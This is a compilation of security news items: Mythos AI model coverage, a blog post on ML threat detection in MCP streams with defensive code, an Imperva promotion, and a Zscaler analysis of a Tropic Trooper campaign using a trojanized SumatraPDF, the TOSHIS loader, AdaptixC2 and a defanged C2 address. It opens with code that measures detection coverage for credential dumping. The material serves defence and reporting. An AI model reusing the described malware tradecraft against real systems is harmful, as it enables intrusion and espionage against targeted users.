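    print("detected       : %d of %d" % procedures_detected(BASELINE_DETECTIONS, PROCEDURES))
    print("after hardening: %d of %d" % procedures_detected(HARDENED_DETECTIONS, PROCEDURES))
```

The technique view reports T1003.001 as covered; the procedure view shows the baseline rules catch two of the three procedures and miss the renamed binary entirely, which is the gap the post describes. Adding a rule keyed on the procedure's arguments instead of the tool name closes it, and the "procedures detected" count is the figure a team can report quarter over quarter.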

Australia and New Zealand central banks monitoring Anthropic's Mythos release

  • None
  • Published date: 2026-04-22 08:12:35

SYDNEY, April 22 : The central banks of Australia and New Zealand said on Wednesday they were monitoring the release of Anthropic's advanced Mythos artificial intelligence model, joining authorities around the world in expressing concerns about the new cybers…

SYDNEY, April 22 : The central banks of Australia and New Zealand said on Wednesday they were monitoring the release of Anthropic's advanced Mythos artificial intelligence model, joining authorities … [+1649 chars]

Anthropic's Mythos model accessed by unauthorised users: Bloomberg

  • Reuters
  • Published date: 2026-04-22 06:21:58

Unauthorized users reportedly gained access to Anthropic's new Mythos AI model via a private online forum on the same day the company announced plans for limited testing. Anthropic is investigating the alleged breach through a third-party vendor environment. …

A small group of unauthorized users has accessed Anthropic's new Mythos AI model, Bloomberg News reported on Tuesday, citing documentation and a person familiar with the matter.A handful of users in … [+903 chars]

Anthropic's Mythos model accessed by unauthorized users, Bloomberg News reports

  • yahoo
  • Published date: 2026-04-22 02:31:02

A handful of users in a private online forum gained access to Mythos on the same day that Anthropic first announced ‌a plan to ⁠release the model... The group has been using Mythos regularly since then, though not for ​cybersecurity purposes... Announced on A…

Anthropic's Mythos model accessed by unauthorized users, Bloomberg News reports yahoo ^ | Tue, April 21, 2026 at 2:49 PM PDT | Reuters Posted on 04/21/2026 7:31:02 PM PDT by … [+1188 chars]

Japan finance minister to meet banks to discuss Mythos AI model, Bloomberg News reports

  • None
  • Published date: 2026-04-22 02:20:35

April 21 : Japan's Finance Minister Satsuki Katayama plans to meet the country's biggest banks and other financial institutions as early as this week to discuss Anthropic PBC's latest AI model Mythos, Bloomberg News reported on Tuesday citing people familiar …

April 21 : Japan's Finance Minister Satsuki Katayama plans to meet the country's biggest banks and other financial institutions as early as this week to discuss Anthropic PBC's latest AI model Mythos… [+590 chars]

Agentic Cloud Security: Fixing AI’s 4 Biggest Gaps

  • None
  • Published date: 2026-04-22 00:00:00

None

<p>The post <a href="https://www.uptycs.com/blog/agentic-cloud-security-solving-security-ai-biggest-problems">Agentic Cloud Security: Fixing AI’s 4 Biggest Gaps</a> appeared first on <a href="https://www.uptycs.com/blog">Uptycs Blog</a>.</p><p>Take an armful of customer data, shove it into an off-the-shelf large language model, and ask Claude for a system prompt that summarizes alerts and generates remediation steps. Congratulations, you’ve not only learned the entire history of security AI product releases over the past three years, but also how they were built.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.uptycs.com/blog">Uptycs Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Umesh Sirsiwal">Umesh Sirsiwal</a>. Read the original post at: <a href="https://www.uptycs.com/blog/agentic-cloud-security-solving-security-ai-biggest-problems">https://www.uptycs.com/blog/agentic-cloud-security-solving-security-ai-biggest-problems</a> </p>

Automated ML-driven threat hunting in post-quantum encrypted MCP streams

  • None
  • Published date: 2026-04-22 00:00:00

None

<p>The post <a href="https://www.gopher.security/blog/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams">Automated ML-driven threat hunting in post-quantum encrypted MCP streams</a> appeared first on <a href="https://www.gopher.security/blog">Read the Gopher Security's Quantum Safety Blog</a>.</p><h2>The new frontier of mcp security and quantum risks</h2><p>Imagine if you finally locked your front door with a key that literally cannot be copied, but then you realize you can't see through the peephole anymore to see who is knocking. That is exactly what happens when we switch to post-quantum cryptography (pqc) for our Model Context Protocol (mcp) streams. For those who aren't deep in the weeds, mcp is an open standard that lets ai models connect to external data sources and tools. We get amazing privacy with it, but we lose the ability to actually see what the ai is doing.</p><p>Traditional signature-based DPI is basically dead when it comes to quantum-resistant tunnels. (<a href="https://www.ias.edu/security/deep-packet-inspection-dead-and-heres-why">Deep packet inspection is dead, and here's why | Security</a>) If you try to break the encryption to look for threats, the latency hit is massive. I've seen setups where the lag makes the ai basically unusable for real-time tasks. Behavioral/ML-driven traffic analysis is the successor here, because it doesn't need to crack the code to see if something is fishy.</p><ul> <li><strong>The visibility gap</strong>: While some claim pqc like Kyber makes inspection impossible, the reality is that it just makes it incredibly difficult for middleboxes to sniff traffic without being a verified endpoint. 
In a retail setting, this means a compromised mcp server could be leaking customer data, and your firewall wouldn't have a clue because it can't "man-in-the-middle" the connection easily.</li> <li><strong>Latency nightmares</strong>: Decrypting and re-encrypting pqc traffic at the edge adds milliseconds that stack up fast. For high-frequency finance apps, that delay is a deal-breaker.</li> <li><strong>Metadata is king</strong>: Since the payload is encrypted and its contents are hidden, we have to teach ml models to look at "the shape" of the traffic—timing, packet sizes, and bursts—to find bad actors.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/690c83ae1ca595b8c6f91e0f/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams/mermaid-diagram-1.svg" alt="Diagram 1"></p><p>The mcp creates a huge new playground for hackers. It isn't just about stealing data; it is about "puppet attacks." This is where a malicious resource—like a poisoned healthcare database—tricks the model into executing commands it shouldn't. ML detects these puppet attacks by identifying unusual sequences of tool calls that deviate from how the model usually acts. If it suddenly starts calling a "delete" function after a "read" request in a way it never has before, the ml flags the anomaly.</p><p>According to a <a href="https://www.ibm.com/reports/threat-intelligence">2024 report by IBM</a>, the average cost of a data breach is hitting record highs. If a tool is poisoned in a dev environment, the ai might start "hallucinating" malicious code directly into your production repo.</p><p>Honestly, we're moving toward a world where the infrastructure is so complex that humans can't watch the gates anymore. 
We need ml that's as smart as the ai it's protecting.</p><h2>Implementing automated ml for encrypted threat hunting</h2><p>So, we’ve hidden our mcp traffic inside these beefy quantum-resistant tunnels, which is great for privacy but sucks for visibility. It’s like trying to guess what someone is cooking just by listening to the clinking of their pans—you can't see the ingredients, but the rhythm tells a story.</p><p>To get around this "blind spot," we’re seeing a shift toward p2p (peer-to-peer) connectivity for mcp flows. Using tools like Gopher Security—an identity-based security platform—helps because they don't just dump data into a black hole; they create a 4D security framework that looks at the context around the encrypted stream.</p><p>Instead of trying to crack the pqc—which is basically impossible anyway—this approach focuses on the behavior of the mcp servers themselves. If a server in a retail environment suddenly starts sending huge bursts of data to an unknown IP at 3 AM, the ml doesn't need to read the packets to know something is wrong.</p><ul> <li><strong>Zero-day spotting</strong>: By monitoring how an ai model usually talks to its tools, Gopher's framework can flag when a "handshake" looks slightly off.</li> <li><strong>P2P resilience</strong>: Because the data flows directly between nodes rather than through a central hub, there is less "noise" for the ml to sift through.</li> <li><strong>Visibility without decryption</strong>: You get the metadata needed for training without ever touching the actual keys.</li> </ul><p>Since the payload is encrypted and its contents are hidden, we have to get creative with "feature engineering." We look at the timing between packets, the exact size of the chunks being sent, and which way the data is flowing.</p><p>For example, a "normal" model-to-tool handshake in a finance app has a very specific cadence. 
If we suddenly see a massive outbound flow after a tiny inbound request, that's a huge red flag for data exfiltration.</p><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/690c83ae1ca595b8c6f91e0f/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams/mermaid-diagram-2.svg" alt="Diagram 2"></p><p>According to a 2023 study by Palo Alto Networks, over 50% of security operations center (soc) analysts are overwhelmed by the sheer volume of alerts, which is why automating this ml "hunting" is so critical. </p><p>Here is a quick snippet of how a security engineer might start grouping these features to look for high-entropy payloads or weird timing:</p><pre><code class="language-python">import math def analyze_mcp_behavior(packet_sizes, intervals): # Calculate entropy of packet sizes to find hidden data entropy = -sum((p/sum(packet_sizes)) * math.log2(p/sum(packet_sizes)) for p in packet_sizes if p &gt; 0) # Check for jitter/timing anomalies avg_interval = sum(intervals) / len(intervals) if entropy &gt; 7.5 or avg_interval &lt; 0.001: trigger_behavioral_alert("Potential exfiltration or puppet attack detected") return "flow_analyzed" </code></pre><p>Honestly, the goal is to make the security as smart as the ai it’s watching. If we don't, we're just building faster cars with no brakes.</p><h2>Real-time detection and policy enforcement</h2><p>Finding out someone is trying to mess with your ai model is one thing, but actually stopping them in mid-air without crashing the whole system? That’s the real trick. </p><p>When you're dealing with mcp streams wrapped in pqc, you can't just pull the plug on every suspicious packet or you'll break the very tools the ai needs to function. We need a way to turn those ml insights into "surgical" blocks.</p><ul> <li><strong>Dynamic permission shifts</strong>: Based on real-time risk, you can strip away "write" access and leave only "read" permissions. 
</li> <li><strong>Prompt injection shields</strong>: By looking at the entropy of the parameters being passed to mcp tools, we can stop "jailbreak" attempts. </li> <li><strong>Environmental checks</strong>: If a dev is hitting a production mcp server from a device with an outdated kernel, the policy engine can block the connection.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/690c83ae1ca595b8c6f91e0f/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams/mermaid-diagram-3.svg" alt="Diagram 3"></p><p>If a tool gets compromised—like a retail inventory api that starts acting like a command-and-control server—you need to move fast. Manual intervention is too slow when ai is chatting at 100 tokens per second. </p><p>We use soar (security orchestration, automation, and response) playbooks that trigger the moment the ml flags a "critical" anomaly. According to research by Mandiant, the speed of cloud-native exploits means human response times are no longer sufficient, making automated isolation the only viable path.</p><pre><code class="language-python">def enforce_mcp_policy(risk_score, tool_id): if risk_score &gt; 0.9: quarantine_resource(tool_id) log_event("CRITICAL: Tool isolated due to anomaly") elif risk_score &gt; 0.6: apply_read_only_mode(tool_id) log_event("WARNING: Restricted access applied") </code></pre><h2>Future-proofing the ai security stack</h2><p>So, we’ve built this high-speed, quantum-proof monster, but how do we keep it from falling apart when the traffic hits a million requests per second? It is one thing to secure a lab environment, it’s a whole different beast when you are running mcp streams across a global retail or finance network.</p><p>When you’re pushing that much data through pqc tunnels, your standard cpu is going to scream for mercy. Most big players are moving toward hardware acceleration—think smartNICs or dedicated fpga cards—to offload the encryption. 
</p><ul> <li><strong>Hardware offloading</strong>: Using dedicated chips for pqc means your ai doesn't stutter every time it calls a tool.</li> <li><strong>Global mesh</strong>: Instead of a central bottleneck, use a peer-to-peer mesh where security policies are synced across every node.</li> <li><strong>API complexity</strong>: Your security stack has to automatically "learn" the schema of every new tool added to the mcp.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/690c83ae1ca595b8c6f91e0f/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams/mermaid-diagram-4.svg" alt="Diagram 4"></p><p>Honestly, the lawyers and auditors are usually the ones most stressed about this stuff. How do you prove you’re following gdpr or soc 2 when you’re using encryption that literally nobody can break? It creates a weird paradox for governance.</p><p>You need automated compliance management that logs the <em>fact</em> that a security check happened, even if it can't see the raw data. As mentioned earlier, we have to rely on metadata and "the shape" of the traffic to prove to auditors that we’re stopping data leaks. </p><ul> <li><strong>Proof of inspection</strong>: Logs should show that an ml model scanned the packet timing and size.</li> <li><strong>Governance at scale</strong>: Use "security as code" to push out new quantum-resistant policies to every ai agent in your fleet at once.</li> <li><strong>Future-proofing</strong>: Start transitioning your root certificates to pqc now, because "store now, decrypt later" attacks are a real thing hackers are doing today.</li> </ul><p>The next decade of ai infrastructure is going to be messy, but if we bake this quantum-resistant security into the mcp stack now, we won't be scrambling when the first real quantum computers start knocking on our doors. 
It’s about building a stack that’s fast, invisible, and smart enough to watch its own back.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.gopher.security/blog">Read the Gopher Security's Quantum Safety Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Read the Gopher Security's Quantum Safety Blog">Read the Gopher Security's Quantum Safety Blog</a>. Read the original post at: <a href="https://www.gopher.security/blog/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams">https://www.gopher.security/blog/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams</a> </p>
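The SOAR snippet and the "proof of inspection" logging described in the Gopher Security post above, carried into a fuller example that is added here and is not the post's own code: it scores a tool's stream from packet timing and size only, applies the post's 0.9 and 0.6 thresholds, and returns the audit record an auditor can check without ever seeing plaintext. The scoring weights, the sample streams and the tool names are assumptions for illustration.

```python
"""Metadata-only anomaly scoring and policy enforcement for an MCP tool stream.

Added example, not code from the original post. It scores a tool's stream
from packet sizes and inter-arrival times only (the ciphertext is never
opened), applies the post's 0.9 / 0.6 thresholds, and emits the
'proof of inspection' audit record the governance section asks for.
All packet samples below are constructed.
"""
from dataclasses import dataclass
from statistics import mean, pstdev
from typing import Dict, List


@dataclass(frozen=True)
class PacketMeta:
    ts: float   # seconds since the stream was first seen
    size: int   # bytes on the wire; ciphertext length, never content


def _cv(values: List[float]) -> float:
    """Coefficient of variation (std / mean); 0.0 for a constant series."""
    m = mean(values)
    return pstdev(values) / m if m else 0.0


def risk_score(packets: List[PacketMeta]) -> float:
    """0.0 for bursty, variable-size interactive tool calls; near 1.0 for a
    fixed-cadence, fixed-size stream, the shape of a tool that has started
    behaving like a C2 beacon. Timing is weighted above size because payload
    padding defeats the size signal but not the cadence signal (assumed weights)."""
    if len(packets) < 3:
        return 0.0                      # too little metadata to judge
    gaps = [b.ts - a.ts for a, b in zip(packets, packets[1:])]
    regularity = 1.0 - min(1.0, _cv(gaps))
    uniformity = 1.0 - min(1.0, _cv([float(p.size) for p in packets]))
    return round(0.7 * regularity + 0.3 * uniformity, 4)


def enforce_mcp_policy(tool_id: str, packets: List[PacketMeta]) -> Dict:
    """Apply the post's SOAR tiers and return the audit record."""
    score = risk_score(packets)
    if score > 0.9:
        action = "quarantine"           # isolate the tool, as in the post
    elif score > 0.6:
        action = "read_only"            # restrict until a human looks
    else:
        action = "allow"
    # The record proves *that* inspection happened and on which features,
    # without logging any decrypted bytes: that is what an auditor can verify.
    return {
        "tool_id": tool_id,
        "packets_seen": len(packets),
        "features_inspected": ["packet_size", "inter_arrival_time"],
        "payload_inspected": False,
        "risk_score": score,
        "action": action,
    }


# Constructed sample streams (not captured traffic).
BEACON_LIKE = [PacketMeta(ts=60.0 * i, size=512) for i in range(10)]
INTERACTIVE = [PacketMeta(ts=t, size=s) for t, s in zip(
    [0.0, 0.3, 2.1, 2.2, 9.8, 10.1, 25.0, 25.4, 60.2, 61.0],
    [220, 1480, 310, 5000, 180, 2600, 400, 9000, 150, 700])]
JITTERED = [PacketMeta(ts=t, size=s) for t, s in zip(
    [0.0, 55.0, 120.0, 178.0, 240.0, 300.0, 357.0, 420.0, 479.0, 540.0],
    [512, 1024, 512, 2048, 512, 512, 1024, 512, 4096, 512])]

if __name__ == "__main__":
    for name, stream in [("inventory-api", BEACON_LIKE),
                         ("crm-search", INTERACTIVE), ("ticketing", JITTERED)]:
        print(enforce_mcp_policy(name, stream))
```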

Enterprise-Grade Application Security, Cloud-Native Speed: Introducing Imperva for Google Cloud

  • None
  • Published date: 2026-04-22 00:00:00

None

<p>In today’s dynamic digital environment, the pressure to innovate has never been greater. Development teams are pushing for native cloud tools to maximize performance and cost-efficiency, while security teams require best-of-breed, enterprise-grade protection to defend against an ever-evolving threat landscape. This often creates a point of friction, forcing organizations into a difficult trade-off: sacrifice performance for security, or accept weaker protections for the sake of speed.</p><p>To resolve this challenge, Thales Imperva is collaborating with Google Cloud to deliver a solution that helps bridge this gap. We are proud to introduce Imperva for Google Cloud (IGC), an integrated security solution that offers the best of both worlds: enterprise-grade application security with the cloud-native performance you expect from Google Cloud.</p><h2><strong>Imperva for Google Cloud: A Holistic, Integrated Solution</strong></h2><p>Imperva for Google Cloud is not just another security layer; it is a fully managed, best-in-class Web Application and API Protection (WAAP) solution built directly into the fabric of Google Cloud. This integration, available now on Google Cloud Marketplace, provides robust protection without disrupting your existing infrastructure or workflows.</p><ul> <li><strong>Cloud-Native Performance Without Compromise:</strong> Imperva for Google Cloud uses Google Cloud’s native Service Extension and Private Service Connect to inspect traffic within the Google Cloud network. This means all traffic analysis happens without your data ever leaving Google Cloud infrastructure, preserving optimal latency, performance, and data residency.</li> <li><strong>Quick Deployment:</strong> Forget complex re-architecture. Imperva for Google Cloud can be deployed quickly using familiar tools like Terraform, Google Cloud CLI (gCloud CLI), or the Google Cloud console UI. 
There are no disruptive DNS, SSL, or network routing changes required, allowing you to achieve production-ready protection almost immediately.</li> <li><strong>Enterprise-Grade Protection Out of the Box:</strong> Imperva for Google Cloud is powered by Imperva’s industry-leading security engine, delivering comprehensive WAF, advanced API Security, and Account Bot Protection. Backed by 24/7 threat research, the Imperva solution provides near-zero false positives, with 97% of customers successfully using default policies and 95% running in blocking mode from day one. This dramatically reduces the operational overhead of constant rule tuning.</li> </ul><h2><strong>Real-World Impact: Securely Accelerating Your Business</strong></h2><p>By eliminating the trade-offs between security and performance, Imperva for Google Cloud helps organizations achieve key business outcomes:</p><ul> <li><strong>Accelerate Lift-and-Shift Migrations:</strong> Migrate workloads to Google Cloud confidently with security that adapts to your applications, not the other way around. Eliminate migration delays caused by complex security re-architecture.</li> <li><strong>Unleash DevOps-Friendly Security:</strong> Empower development teams to innovate at speed. 
IGC closes the security gaps in built-in tools without slowing down deployment velocity or requiring developers to become security experts.</li> <li><strong>Protect Modern Cloud-Native Applications:</strong> Secure your Kubernetes and microservices architectures with best-in-class defenses optimized for low-latency environments.</li> <li><strong>Achieve Unified Multi-Cloud Governance:</strong> Manage security for all your Imperva-protected environments from a single, unified dashboard, providing consistent policy management and visibility across your entire multi-cloud estate.</li> </ul><p><em>“Bringing Thales Imperva to Google Cloud Marketplace will help customers quickly deploy, manage, and grow the company’s integrated security solution on Google Cloud’s trusted, global infrastructure,” said Dai Vu, Managing Director, Marketplace &amp; ISV GTM Programs at Google Cloud. “Thales can now securely scale and support organizations that want to use its Imperva for Google Cloud solution to increase protection for their cloud-native applications, APIs, microservices and more.”</em></p><h2><strong>Join Us on the Journey to More Seamless Cloud Security</strong></h2><p>As we approach key industry events like our exclusive Executive Briefing Center (EBC) meeting in late March and Google Cloud Next 2026 in April, the conversation around integrated security has never been more relevant. 
The launch of Imperva for Google Cloud marks a pivotal moment in our relationship with Google, providing a clear path for customers to secure their digital assets without compromise.</p><p><strong>Ready to secure your cloud-native applications?</strong></p><ul> <li><strong>Request a demo</strong>: Experience IGC in action at <a href="https://www.imperva.com/products/imperva-for-google-cloud/">Imperva for Google Cloud</a></li> <li><strong>Start your evaluation</strong>: Available now on <a href="https://console.cloud.google.com/marketplace/product/cpl-vpop-p-mktp-global-02/ias4gc?project=workflow-test-474814&amp;pli=1&amp;login=true&amp;ref=https:%2F%2Fstatics.teams.cdn.office.net%2F" rel="noopener">Google Cloud Marketplace</a></li> </ul><p>The post <a href="https://www.imperva.com/blog/enterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud/">Enterprise-Grade Application Security, Cloud-Native Speed: Introducing Imperva for Google Cloud</a> appeared first on <a href="https://www.imperva.com/blog">Blog</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.imperva.com/blog/">Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Ido Mantsur">Ido Mantsur</a>. Read the original post at: <a href="https://www.imperva.com/blog/enterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud/">https://www.imperva.com/blog/enterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud/</a> </p>

Unauthorized Users Reportedly Gain Access to Anthropic’s Mythos AI Model

  • Jeffrey Burt
  • Published date: 2026-04-22 00:00:00

None

<p>A group of unauthorized users reportedly has gained access to Anthropic’s controversial Claude Mythos Preview AI frontier model despite the AI vendor’s efforts to keep it out of public hands by limiting the organizations that can use it.</p><p><a href="https://www.bloomberg.com/news/articles/2026-04-21/anthropic-s-mythos-model-is-being-accessed-by-unauthorized-users" target="_blank" rel="noopener">Bloomberg reported</a> that the unnamed group had tried multiple ways to gain access to the AI model since it was first announced earlier this month, and finally was able to get through via a third-party vendor. The users, who accessed Mythos on the day it was announced, are part of a Discord online forum group known to search for information about unreleased AI models.</p><p>According to the report, the group, using knowledge it had about a format Anthropic had used for other models, “made an educated guess about [Mythos’] online location.” A person inside the group that Bloomberg communicated with told the news outlet that they were “interested in playing around with new models, not wreaking havoc with them.”</p><p>In a <a href="https://techcrunch.com/2026/04/21/unauthorized-group-has-gained-access-to-anthropics-exclusive-cyber-tool-mythos-report-claims/" target="_blank" rel="noopener">statement</a> to TechCrunch, an Anthropic spokesperson said the company was investigating the claim of unauthorized access to Mythos through a third-party vendor, and that the company has not found indications that the group’s activities have affected its systems.</p><h3>Mythos’ Ongoing Ripple Effect</h3><p>Anthropic’s <a href="https://securityboulevard.com/2026/04/anthropic-unveils-restricted-ai-cyber-model-in-unprecedented-industry-alliance/" target="_blank" rel="noopener">announcement</a> of Mythos April 7 sent shockwaves through the cybersecurity industry. 
The vendor described a frontier model that is significantly better than any other developed at detecting and identifying software vulnerabilities, noting that in tests, Mythos was able to find a security flaw that had been present yet undetected for 27 years.</p><p>However, the model also is <a href="https://www.anthropic.com/glasswing" target="_blank" rel="noopener">very good at creating exploits</a> for the vulnerabilities, which convinced Anthropic executives to limit the release of Mythos to a select group of organizations that will use it to create stronger defenses as part of the AI vendor’s new <a href="https://red.anthropic.com/2026/mythos-preview/" target="_blank" rel="noopener">Project Glasswing</a>.</p><p>OpenAI a week later followed a similar path with the <a href="https://securityboulevard.com/2026/04/openai-follows-anthropic-in-limiting-access-to-its-cyber-focused-model/" target="_blank" rel="noopener">unveiling of GPT-5.4-Cyber</a>, a frontier model focused on cybersecurity that the vendor also designated for particular users, though granting access to more organizations and individuals than Anthropic.</p><p>The introduction of Mythos ignited debates about everything from what cybersecurity looks like once such autonomous AI models come into play, to what organizations need to do to secure their IT environments, to whether Mythos’ capabilities are unique.</p><h3>Speed is the Difference</h3><p>However, enterprises and their security teams need to pay attention, according to Brian Fox, co-founder and CTO of Sonatype, which provides a software supply chain management platform.</p><p>“If the early reporting is right, Mythos could be a watershed moment,” Fox said. “What is not new is the reality it is forcing people to confront. Beneath the AI framing sits the same software supply chain reality we have been discussing for years: dependencies, build pipelines, third-party software, and infrastructure remain the attack surface.”</p><p>Fox added that “what changed is speed. 
AI can now find and operationalize weaknesses across that stack faster than most organizations can inventory, prioritize, and patch them. What we are seeing in response to the Mythos news is many organizations coming to terms with a reality that has existed for a long time: they are not actually in control of their software supply chains.”</p><h3>Addressing the Threats</h3><p>Tech vendors are beginning to roll out offerings aimed at helping organizations deal with the cyber risks posed by such frontier models. IBM Consulting last week <a href="https://securityboulevard.com/2026/04/new-ibm-security-services-aim-to-counter-risks-of-frontier-ai-models/" target="_blank" rel="noopener">introduced IBM Autonomous Security</a>, a collection of specialized agents created to make enterprises’ often sprawling security stacks work in a more unified and coordinated fashion, creating what the vendor called “a systemic defense” that is needed to address the autonomous and fast-moving threats from such models.</p><p>At the same time, IBM is offering a new service for assessing a company’s security weaknesses and responding to them.</p><p>Likewise, Palo Alto Networks launched <a href="https://www.paloaltonetworks.com/blog/2026/04/introducing-unit-42-frontier-ai-defense/" target="_blank" rel="noopener">Unit 42 Frontier AI Defense</a>, an offering that uses AI models to help organizations “identify and validate the exposures most likely to be chained into real attacks before attackers weaponize them,” with Sam Rubin, senior vice president of consulting and threat intelligence at Unit 42, writing that “frontier AI is changing what is possible for attackers. In the hands of defenders, it can become a decisive advantage.”</p><h3>What Publicly Available Models Can Do</h3><p>Mythos and GPT-5.4-Cyber have garnered much of the attention about the cybersecurity risks such frontier models represent. 
However, some security vendors wrote that they tested publicly available AI models and found that many of them came close to or matched Mythos’ ability to find and identify zero-day vulnerabilities.</p><p>Executives with startup Aisle, which offers an AI-native app security platform, <a href="https://aisle.com/blog/ai-cybersecurity-after-mythos-the-jagged-frontier" target="_blank" rel="noopener">wrote</a> that over the past year, they had built an AI system for discovering, validating, and patching zero-days in open source software. In tests, they “took the specific vulnerabilities Anthropic showcases in their announcement, isolated the relevant code, and ran them through small, cheap, open-weights models. Those models recovered much of the same analysis.”</p><p>The models included GPT-OSS-120b, DeepSeek R1, Qwen3, and Gemma 4. The results varied depending on the model and the task, they wrote.</p><h3>The Real Story</h3><p>Researchers with Vidoc Security Lab, another AI-based cybersecurity startup, <a href="https://blog.vidocsecurity.com/blog/we-reproduced-anthropics-mythos-findings-with-public-models" target="_blank" rel="noopener">wrote</a> that they came up with similar results with OpenAI’s GPT-5.4 and Anthropic’s Claude Opus 4.6 models running OpenCode, an open source AI coding agent, scanning for security flaws in open source software like OpenBSD and FFmpeg.</p><p>“If public models can already do useful work inside that kind of workflow, then the story is not ‘Anthropic has a magical cyber artifact,’” they wrote. “The story is that serious AI-assisted vulnerability research is no longer confined to a single frontier lab. That does not make the workflow easy. 
It means the moat is moving up the stack, from model access to validation, prioritization, and remediation.”</p>

Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener

  • None
  • Published date: 2026-04-22 00:00:00

None

<p>The post <a href="https://www.zscaler.com/blogs/security-research/tropic-trooper-pivots-adaptixc2-and-custom-beacon-listener">Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener</a> appeared first on <a href="https://www.zscaler.com/blogs/feeds/security-research">Security Research | Blog</a>.</p><p>IntroductionOn March 12, 2026, Zscaler ThreatLabz discovered a malicious ZIP archive containing military-themed document lures targeting Chinese-speaking individuals. Our analysis of this sample uncovered a campaign leveraging a multi-stage attack chain where a trojanized SumatraPDF reader deploys an AdaptixC2 Beacon agent, ultimately leading to the download and abuse of Visual Studio (VS) Code tunnels for remote access. During our analysis, we observed that the threat actor likely targeted Chinese-speaking individuals in Taiwan, and individuals in South Korea and Japan. Based on the tactics, techniques, and procedures (TTPs) observed in this attack, ThreatLabz attributes this activity to Tropic Trooper (also known as Earth Centaur and Pirate Panda) with high confidence.In this blog post, ThreatLabz covers the Tropic Trooper campaign and the tools that were deployed to conduct intelligence gathering. Key TakeawaysOn March 12, 2026, ThreatLabz discovered a malicious ZIP archive containing military-themed document lures targeting Chinese-speaking individuals.The campaign used a trojanized SumatraPDF binary to deploy an AdaptixC2 Beacon and ultimately VS Code on targeted machines.The shellcode loader used in this attack closely resembles the TOSHIS loader, which has been associated with Tropic Trooper and was previously reported in the TAOTH campaign.The threat actors created a custom AdaptixC2 Beacon listener, leveraging GitHub as their command-and-control (C2) platform.The staging server involved in this attack also hosted CobaltStrike Beacon and an EntryShell backdoor. Both malware types and configurations are known to have been used by Tropic Trooper. 
Technical AnalysisIn the sections below, ThreatLabz outlines the attack chain, starting with military-themed lures and leading to the deployment of the AdaptixC2 Beacon agent. We also discuss the use of a custom GitHub listener and the recurring TTP of abusing VS Code for remote access.Attack chainThe full sequence of the attack is illustrated in the figure below.Figure 1: Tropic Trooper attack chain leading to the deployment of an AdaptixC2 Beacon and VS Code tunnels.The ZIP archive contained documents with the following names roughly translated to English:Original Chinese FilenameEnglish TranslationCECC昆山元宇宙产业基地建设方案(20230325).docxCECC Kunshan Metaverse Industrial Base Construction Plan (20230325).docx中国声学智能产业声创中心建设和运营方案(2021112)(2)(1)(1).docxChina Acoustic Intelligence Industry Innovation Center Construction and Operation Plan (2021112)(2)(1)(1).docx武器装备体系结构贡献度评估.pdfAssessment of Contribution Degree of Weaponry System Architecture.pdf武器装备体系能力贡献度的解析与度量方法.pdfAnalysis and Measurement Methods for Capability Contribution of Weaponry Systems.pdf江苏自主智能无人系统产业基地建设方案(202304) .docxJiangsu Autonomous Intelligent Unmanned Systems Industrial Base Construction Plan (202304).docx美英与美澳核潜艇合作的比较分析(2025).exeComparative Analysis of US-UK and US-Australia Nuclear Submarine Cooperation (2025).exeTable 1: The table lists the files found inside the ZIP archive, showing each original Chinese filename alongside its approximate English translation.Most of these files appear outdated. The document that appears to be the most recent, Comparative Analysis of US-UK and US-Australia Nuclear Submarine Cooperation (2025).exe, is actually a trojanized version of the SumatraPDF reader binary. 
When executed, this loader triggers a multi-stage attack: it downloads and displays a new decoy PDF that is shown to the victim while discreetly downloading and running an AdaptixC2 Beacon agent in the background.The downloaded lure PDF aligns with its file name, featuring analysis and visuals concerning American submarines and the AUKUS partnership (a security partnership between Australia, the U.K., and the U.S). The figure below illustrates the contents of the downloaded lure PDF.Figure 2: Tropic Trooper PDF lure containing information about the AUKUS partnership and American submarines.Stage 1 – TOSHIS loader (backdoored SumatraPDF)The trojanized executable resembles the open-source SumatraPDF reader at first glance, featuring identical certificates and PDB paths to those of the legitimate SumatraPDF executable. However, the signature of this binary is invalid because it has been trojanized with TOSHIS loader. Analysis shows the threat actor hijacks the executable’s control flow by redirecting the _security_init_cookie function to execute malicious code. Compared to earlier TOSHIS loader samples, where the entry point was modified to jump to the payload, this version uses a revised trojanization method that executes by overwriting _security_init_cookie instead.Figure 3: Comparison of the entry points in the trojanized and legitimate SumatraPDF versions.The InjectedCode function redirects to TOSHIS loader code. The function begins by constructing stack strings, which include the command-and-control (C2) IP address, the destination path for the lure file, DLL names, and a cryptographic key. Next, TOSHIS loader resolves various APIs using the Adler-32 hash algorithm. Subsequently, TOSHIS loader downloads the PDF decoy from 58.247.193[.]100 and opens it using ShellExecuteW. 
